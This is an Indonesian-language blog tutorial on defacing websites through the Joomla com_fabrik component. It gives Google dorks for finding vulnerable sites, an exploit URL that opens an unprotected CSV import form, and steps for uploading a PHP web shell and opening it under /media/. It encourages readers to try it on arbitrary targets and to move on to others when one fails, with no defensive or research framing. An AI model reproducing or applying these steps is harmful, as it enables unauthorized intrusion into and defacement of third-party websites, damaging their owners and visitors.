Masih membahas tentang deface. Cara yang satu ini cukup mudah dilakukan.
Dengan menggunakan exploit com_fabrik, kita bisa mengupload shell kita untuk
melakukan deface terhadap web tersebut.
Ok simak tutorial berikut.
inurl:index.php?option=com_fabrik
inurl:viewTable?cid= site:com
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.
2. Akan ada banyak web, anda buka terserah yang mana
3. Masukkan exploit ini :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Contoh :
www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika tidak berhasil cari target lain. Jika berhasil akan muncul form upload seperti ini
5. Klik "pilih file" untuk memilih shell, dan klik "Import CSV untuk mengupload
6. Jika berhasil, buka shell anda dengan format www.site.com/media/namashell.php
7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut
tidak mendukung file berformat php maupun html.
Sekian ilmu yang dapat saya berikan.
Selamat mencoba :n
Ini Website Yang Vuln :
- Dll
EmoticonEmoticon